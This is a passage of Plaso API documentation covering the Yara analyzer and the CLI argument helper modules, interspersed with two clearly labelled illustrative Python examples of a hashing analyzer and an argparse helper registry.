Analyzes a block of data, attempting to match Yara rules to it.
Parameters data (bytes) – a block of data.
DESCRIPTION = 'Matches Yara rules over input data.'
GetResults()
Retrieves results of the most recent analysis.
Returns results.
Return type list[AnalyzerResult]
INCREMENTAL_ANALYZER = False
NAME = 'yara'
PROCESSING_STATUS_HINT = 'yara scan'
Reset()
Resets the internal state of the analyzer.
SetRules(rules_string)
Sets the rules that the Yara analyzer will use.
Parameters rules_string (str) – Yara rule definitions.
Module contents
This file imports Python modules that register analyzers.
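The three pieces documented above (a hasher whose repeated update calls equal one call on the concatenated data, the BaseAnalyzer interface with its INCREMENTAL_ANALYZER and SIZE_LIMIT attributes, and the AnalyzersManager registry keyed on the lower case NAME) fit together as follows. This is an added example and not Plaso's own code: the class and method names follow the documentation, but the bodies, the AnalyzeStream driver, the assumed 'sha256' default hasher, the '<name>_hash' attribute naming and the constructed sample stream are mine.

```python
import abc
import hashlib

class AnalyzerResult:
  """One attribute produced by an analyzer (stand-in for Plaso's AnalyzerResult)."""

  def __init__(self, analyzer_name, attribute_name, attribute_value):
    self.analyzer_name = analyzer_name
    self.attribute_name = attribute_name
    self.attribute_value = attribute_value

class BaseAnalyzer(abc.ABC):
  """Whole-file analysis interface, shaped after the one documented above."""

  NAME = 'base_analyzer'
  INCREMENTAL_ANALYZER = False
  SIZE_LIMIT = 33554432  # 32 MiB cap for analyzers that need the whole file at once.

  @abc.abstractmethod
  def Analyze(self, data):
    """Analyzes a block of data, updating the state of the analyzer."""

  @abc.abstractmethod
  def GetResults(self):
    """Retrieves the results as list[AnalyzerResult]."""

  @abc.abstractmethod
  def Reset(self):
    """Resets the internal state of the analyzer."""

class HashingAnalyzer(BaseAnalyzer):
  """Incremental analyzer hashing a data stream with the enabled hashers."""

  NAME = 'hashing'
  INCREMENTAL_ANALYZER = True

  def __init__(self):
    super().__init__()
    self._hasher_names = []
    self._hashers = {}
    self.SetHasherNames('sha256')  # Assumed default; not taken from the page.

  def SetHasherNames(self, hasher_names_string):
    """Enables the hashers named in a comma separated string; rejects unknown names."""
    names = [name.strip().lower() for name in hasher_names_string.split(',')
             if name.strip()]
    unknown = [name for name in names if name not in hashlib.algorithms_available]
    if unknown:
      raise ValueError('Unsupported hasher(s): {0:s}'.format(', '.join(unknown)))
    self._hasher_names = names
    self.Reset()

  def Reset(self):
    self._hashers = {name: hashlib.new(name) for name in self._hasher_names}

  def Analyze(self, data):
    # Each hash object keeps its running state, so repeated calls are
    # equivalent to one call with the concatenated data.
    for hasher in self._hashers.values():
      hasher.update(data)

  def GetResults(self):
    return [AnalyzerResult(self.NAME, '{0:s}_hash'.format(name), hasher.hexdigest())
            for name, hasher in self._hashers.items()]

class AnalyzersManager:
  """Registry of analyzer classes keyed by their lower case NAME."""

  _analyzer_classes = {}

  @classmethod
  def RegisterAnalyzer(cls, analyzer_class):
    name = analyzer_class.NAME.lower()
    if name in cls._analyzer_classes:
      raise KeyError('Analyzer class already set for name: {0:s}.'.format(name))
    cls._analyzer_classes[name] = analyzer_class

  @classmethod
  def GetAnalyzerInstance(cls, analyzer_name):
    name = analyzer_name.lower()
    if name not in cls._analyzer_classes:
      raise KeyError('Analyzer class not set for name: {0:s}.'.format(name))
    return cls._analyzer_classes[name]()

  @classmethod
  def GetAnalyzerNames(cls):
    return sorted(cls._analyzer_classes)

AnalyzersManager.RegisterAnalyzer(HashingAnalyzer)

def AnalyzeStream(analyzer, chunks):
  """Feeds a stream of byte chunks to an analyzer; returns {attribute: value}.

  An incremental analyzer sees every chunk as it arrives; a non-incremental
  one gets a single call holding at most SIZE_LIMIT bytes.
  """
  analyzer.Reset()
  if analyzer.INCREMENTAL_ANALYZER:
    for chunk in chunks:
      analyzer.Analyze(chunk)
  else:
    analyzer.Analyze(b''.join(chunks)[:analyzer.SIZE_LIMIT])
  return {result.attribute_name: result.attribute_value
          for result in analyzer.GetResults()}
```

Feeding the constructed stream [b'hello ', b'world'] through AnalyzeStream yields the same digests as a single b'hello world' chunk, which is the property the hasher interface promises; the unknown-hasher check in SetHasherNames is where a mistyped name from the command line is rejected instead of silently producing no hash.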
5.1.3 plaso.cli package
Subpackages
plaso.cli.helpers package
Submodules
plaso.cli.helpers.analysis_plugins module
The analysis plugins CLI arguments helper.
class plaso.cli.helpers.analysis_plugins.AnalysisPluginsArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Analysis plugins CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Analysis plugins command line arguments.'
NAME = 'analysis_plugins'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when non-existing analysis plugins are specified.
plaso.cli.helpers.artifact_definitions module
The artifact definitions CLI arguments helper.
class plaso.cli.helpers.artifact_definitions.ArtifactDefinitionsArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Artifact definition CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Artifact definition command line arguments.'
NAME = 'artifact_definitions'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – if the required artifact definitions are not defined.
plaso.cli.helpers.artifact_filters module
The artifacts filter file CLI arguments helper.
class plaso.cli.helpers.artifact_filters.ArtifactFiltersArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Artifacts filter file CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Artifact filters command line arguments.'
NAME = 'artifact_filters'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – if the required artifact definitions are not defined.
plaso.cli.helpers.data_location module
The data location CLI arguments helper.
class plaso.cli.helpers.data_location.DataLocationArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Data location CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Data location command line arguments.'
NAME = 'data_location'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when the location of the data files cannot be determined.
plaso.cli.helpers.database_config module
The database configuration CLI arguments helper.
class plaso.cli.helpers.database_config.DatabaseArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Database configuration CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Argument helper for a database configuration.'
NAME = 'database_config'
classmethod ParseOptions(options, output_module)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• output_module (OutputModule) – output module to configure.
Raises BadConfigObject – when the output module object does not have the SetCredentials or SetDatabaseName methods.
plaso.cli.helpers.date_filters module
The date filters CLI arguments helper.
class plaso.cli.helpers.date_filters.DateFiltersArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Date filters CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Date filters command line arguments.'
NAME = 'date_filters'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when the date filter is badly formatted.
plaso.cli.helpers.dynamic_output module
The dynamic output module CLI arguments helper.
class plaso.cli.helpers.dynamic_output.DynamicOutputArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Dynamic output module CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'output'
DESCRIPTION = 'Argument helper for the dynamic output module.'
NAME = 'dynamic'
classmethod ParseOptions(options, output_module)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• output_module (OutputModule) – output module to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when the output filename was not provided.
plaso.cli.helpers.elastic_output module
The Elastic Search output module CLI arguments helper.
class plaso.cli.helpers.elastic_output.ElasticSearchOutputArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Elastic Search output module CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'output'
DESCRIPTION = 'Argument helper for the Elastic Search output modules.'
NAME = 'elastic'
classmethod ParseOptions(options, output_module)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• output_module (OutputModule) – output module to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
class plaso.cli.helpers.elastic_output.ElasticSearchServerArgumentsHelper
Bases: plaso.cli.helpers.server_config.ServerArgumentsHelper
Elastic Search server CLI arguments helper.
plaso.cli.helpers.event_filters module
The event filters CLI arguments helper.
class plaso.cli.helpers.event_filters.EventFiltersArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Event filters CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Event filters command line arguments.'
NAME = 'event_filters'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.extraction module
The extraction CLI arguments helper.
class plaso.cli.helpers.extraction.ExtractionArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Extraction CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Extraction command line arguments.'
NAME = 'extraction'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.filter_file module
The filter file CLI arguments helper.
class plaso.cli.helpers.filter_file.FilterFileArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Filter file CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Filter file command line arguments.'
NAME = 'filter_file'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – if the collection file does not exist.
plaso.cli.helpers.hashers module
The hashers CLI arguments helper.
class plaso.cli.helpers.hashers.HashersArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Hashers CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Hashers command line arguments.'
NAME = 'hashers'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.interface module
The arguments helper interface.
class plaso.cli.helpers.interface.ArgumentsHelper
Bases: object
CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = ''
DESCRIPTION = ''
NAME = 'baseline'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (object) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.language module
The language CLI arguments helper.
class plaso.cli.helpers.language.LanguageArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Language CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Language command line arguments.'
NAME = 'language'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.manager module
The CLI arguments helper manager objects.
class plaso.cli.helpers.manager.ArgumentHelperManager
Bases: object
Class that implements the CLI argument helper manager.
classmethod AddCommandLineArguments(argument_group, category=None, names=None)
Adds command line arguments to a configuration object.
Parameters
• argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
• category (Optional[str]) – category of helpers to apply to the group, such as storage, output, where None will apply the arguments to all helpers. The category can be used to add arguments to a specific group of registered helpers.
• names (Optional[list[str]]) – names of argument helpers to apply, where None will apply the arguments to all helpers.
classmethod DeregisterHelper(helper_class)
Deregisters a helper class.
The helper classes are identified based on their lower case name.
Parameters helper_class (type) – class object of the argument helper.
Raises KeyError – if helper class is not set for the corresponding name.
classmethod ParseOptions(options, config_object, category=None, names=None)
Parses and validates arguments using the appropriate helpers.
Parameters
• options (argparse.Namespace) – parser options.
• config_object (object) – object to be configured by an argument helper.
• category (Optional[str]) – category of helpers to apply to the group, such as storage, output, where None will apply the arguments to all helpers. The category can be used to add arguments to a specific group of registered helpers.
• names (Optional[list[str]]) – names of argument helpers to apply, where None will apply the arguments to all helpers.
classmethod RegisterHelper(helper_class)
Registers a helper class.
The helper classes are identified based on their lower case name.
Parameters helper_class (type) – class object of the argument helper.
Raises KeyError – if helper class is already set for the corresponding name.
classmethod RegisterHelpers(helper_classes)
Registers helper classes.
The helper classes are identified based on their lower case name.
Parameters helper_classes (list[type]) – class objects of the argument helpers.
Raises KeyError – if helper class is already set for the corresponding name.
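The ArgumentsHelper interface and the ArgumentHelperManager documented above describe a two-phase pattern: every helper first adds its options to an argparse group, then validates the parsed options and writes them into a configuration object, raising BadConfigObject for the wrong target object and BadConfigOption for a value that fails validation. The following is an added example of that pattern and not Plaso's own code: it mirrors the hashers helper from the page, but the '--hashers' flag name, its 'sha256' default, the 'none' keyword, the CLITool stand-in and the ConfigureTool driver are assumptions of mine.

```python
import argparse
import hashlib

class BadConfigObject(Exception):
  """Raised when the object handed to ParseOptions is of the wrong type."""

class BadConfigOption(Exception):
  """Raised when a command line option fails validation."""

class CLITool:
  """Minimal stand-in for the tool object that the helpers configure."""

  def __init__(self):
    self._hasher_names_string = None

class ArgumentsHelper:
  """Interface every argument helper implements."""

  NAME = 'baseline'
  CATEGORY = ''
  DESCRIPTION = ''

  @classmethod
  def AddArguments(cls, argument_group):
    raise NotImplementedError()

  @classmethod
  def ParseOptions(cls, options, configuration_object):
    raise NotImplementedError()

class HashersArgumentsHelper(ArgumentsHelper):
  """Adds and validates a --hashers option (flag name and default are assumed)."""

  NAME = 'hashers'
  DESCRIPTION = 'Hashers command line arguments.'
  DEFAULT_HASHER_STRING = 'sha256'

  @classmethod
  def AddArguments(cls, argument_group):
    argument_group.add_argument(
        '--hashers', dest='hashers', type=str, metavar='HASHER_LIST',
        default=cls.DEFAULT_HASHER_STRING,
        help='Comma separated list of hashers to enable, or "none".')

  @classmethod
  def ParseOptions(cls, options, configuration_object):
    # Check the target object before reading any option, so a caller that
    # passes the wrong object fails closed instead of being partially configured.
    if not isinstance(configuration_object, CLITool):
      raise BadConfigObject('Configuration object is not an instance of CLITool')
    hasher_names_string = getattr(options, 'hashers', cls.DEFAULT_HASHER_STRING)
    if hasher_names_string.lower() != 'none':
      for name in hasher_names_string.split(','):
        if name.strip().lower() not in hashlib.algorithms_available:
          raise BadConfigOption('Unsupported hasher: {0:s}'.format(name.strip()))
    configuration_object._hasher_names_string = hasher_names_string

class ArgumentHelperManager:
  """Registry of helpers keyed by lower case NAME, selectable by category or names."""

  _helper_classes = {}

  @classmethod
  def RegisterHelper(cls, helper_class):
    name = helper_class.NAME.lower()
    if name in cls._helper_classes:
      raise KeyError('Helper class already set for name: {0:s}.'.format(name))
    cls._helper_classes[name] = helper_class

  @classmethod
  def _SelectHelpers(cls, category, names):
    for name, helper_class in sorted(cls._helper_classes.items()):
      if category is not None and helper_class.CATEGORY != category:
        continue
      if names is not None and name not in names:
        continue
      yield helper_class

  @classmethod
  def AddCommandLineArguments(cls, argument_group, category=None, names=None):
    for helper_class in cls._SelectHelpers(category, names):
      helper_class.AddArguments(argument_group)

  @classmethod
  def ParseOptions(cls, options, config_object, category=None, names=None):
    for helper_class in cls._SelectHelpers(category, names):
      helper_class.ParseOptions(options, config_object)

ArgumentHelperManager.RegisterHelper(HashersArgumentsHelper)

def ConfigureTool(argv, names=None):
  """Builds a parser from the selected helpers and configures a CLITool.

  Returns (tool, None) on success, or (None, error class name) when a helper
  rejects the options, so a caller can report the problem without a traceback.
  """
  parser = argparse.ArgumentParser(add_help=False)
  ArgumentHelperManager.AddCommandLineArguments(parser, names=names)
  options = parser.parse_args(argv)
  tool = CLITool()
  try:
    ArgumentHelperManager.ParseOptions(options, tool, names=names)
  except (BadConfigObject, BadConfigOption) as exception:
    return None, type(exception).__name__
  return tool, None
```

Running ConfigureTool(['--hashers', 'md5,sha256'], names=['hashers']) configures the tool, while a misspelt hasher name is turned into a BadConfigOption before any processing starts; the category and names filters let a tool pull in only the helpers that apply to it, which is how the page describes the manager selecting helpers such as the 'output' or 'analysis' category.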
plaso.cli.helpers.nsrlsvr_analysis module
The nsrlsvr analysis plugin CLI arguments helper.
class plaso.cli.helpers.nsrlsvr_analysis.NsrlsvrAnalysisArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Nsrlsvr analysis plugin CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – group to append arguments to.
CATEGORY = 'analysis'
DESCRIPTION = 'Argument helper for the nsrlsvr analysis plugin.'
NAME = 'nsrlsvr'
classmethod ParseOptions(options, analysis_plugin)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options object.
• analysis_plugin (NsrlsvrAnalysisPlugin) – analysis plugin to configure.
Raises
• BadConfigObject – when the analysis plugin is the wrong type.
• BadConfigOption – when unable to connect to nsrlsvr instance.
plaso.cli.helpers.output_modules module
The output modules CLI arguments helper.
class plaso.cli.helpers.output_modules.OutputModulesArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Output modules CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Output modules command line arguments.'
NAME = 'output_modules'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when the output format is not supported or the output is not provided or already exists.
plaso.cli.helpers.parsers module
The parsers CLI arguments helper.
class plaso.cli.helpers.parsers.ParsersArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Parsers CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Parsers command line arguments.'
NAME = 'parsers'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.process_resources module
The process resources CLI arguments helper.
class plaso.cli.helpers.process_resources.ProcessResourcesArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Process resources CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Process resources command line arguments.'
NAME = 'process_resources'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.profiling module
The profiling CLI arguments helper.
class plaso.cli.helpers.profiling.ProfilingArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Profiling CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DEFAULT_PROFILING_SAMPLE_RATE = 1000
DESCRIPTION = 'Profiling command line arguments.'
NAME = 'profiling'
PROFILERS_INFORMATION = {'analyzers': 'Profile CPU time of analyzers, like hashing', 'memory': 'Profile memory usage over time', 'parsers': 'Profile CPU time per parser', 'processing': 'Profile CPU time of processing phases', 'serializers': 'Profile CPU time of serialization', 'storage': 'Profile storage reads and writes', 'task_queue': 'Profile task queue status (multi-processing only)', 'tasks': 'Profile the status of tasks (multi-processing only)'}
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when the configuration options are missing or not supported.
plaso.cli.helpers.server_config module
The server configuration CLI arguments helper.
class plaso.cli.helpers.server_config.ServerArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Server configuration CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Argument helper for a server configuration.'
NAME = 'server_config'
classmethod ParseOptions(options, output_module)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• output_module (OutputModule) – output module to configure.
Raises BadConfigObject – when the output module object does not have the SetServerInformation method.
plaso.cli.helpers.sessionize_analysis module
The sessionize analysis plugin CLI arguments helper.
class plaso.cli.helpers.sessionize_analysis.SessionizeAnalysisArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Sessionize analysis plugin CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'analysis'
DESCRIPTION = 'Argument helper for the Sessionize analysis plugin.'
NAME = 'sessionize'
classmethod ParseOptions(options, analysis_plugin)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• analysis_plugin (OutputModule) – analysis plugin to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.status_view module
The status view CLI arguments helper.
class plaso.cli.helpers.status_view.StatusViewArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Status view CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Status view command line arguments.'
NAME = 'status_view'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.storage_file module
The storage file CLI arguments helper.
class plaso.cli.helpers.storage_file.StorageFileArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Storage file CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Storage file command line arguments.'
NAME = 'storage_file'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises BadConfigObject – when the configuration object is of the wrong type.
plaso.cli.helpers.storage_format module
The storage format CLI arguments helper.
class plaso.cli.helpers.storage_format.StorageFormatArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Storage format CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Storage format command line arguments.'
NAME = 'storage_format'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – if the storage format or task storage is not defined or supported.
plaso.cli.helpers.tagging_analysis module
The tagging analysis plugin CLI arguments helper.
class plaso.cli.helpers.tagging_analysis.TaggingAnalysisArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Tagging analysis plugin CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments the helper supports to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
CATEGORY = 'analysis'
DESCRIPTION = 'Argument helper for the Tagging analysis plugin.'
NAME = 'tagging'
classmethod ParseOptions(options, analysis_plugin)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• analysis_plugin (AnalysisPlugin) – analysis plugin to configure.
Raises
• BadConfigObject – when the output module object is of the wrong type.
• BadConfigOption – when a configuration parameter fails validation.
plaso.cli.helpers.temporary_directory module
The temporary directory CLI arguments helper.
class plaso.cli.helpers.temporary_directory.TemporaryDirectoryArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Temporary directory CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
Parameters argument_group (argparse._ArgumentGroup|argparse.ArgumentParser) – argparse group.
DESCRIPTION = 'Temporary directory command line arguments.'
NAME = 'temporary_directory'
classmethod ParseOptions(options, configuration_object)
Parses and validates options.
Parameters
• options (argparse.Namespace) – parser options.
• configuration_object (CLITool) – object to be configured by the argument helper.
Raises
• BadConfigObject – when the configuration object is of the wrong type.
• BadConfigOption – when the temporary directory does not exist.
plaso.cli.helpers.text_prepend module
The text prepend CLI arguments helper.
class plaso.cli.helpers.text_prepend.TextPrependArgumentsHelper
Bases: plaso.cli.helpers.interface.ArgumentsHelper
Text prepend CLI arguments helper.
classmethod AddArguments(argument_group)
Adds command line arguments to an argument group.
This function takes an argument parser or an argument group object and adds to it all the command line arguments this helper supports.
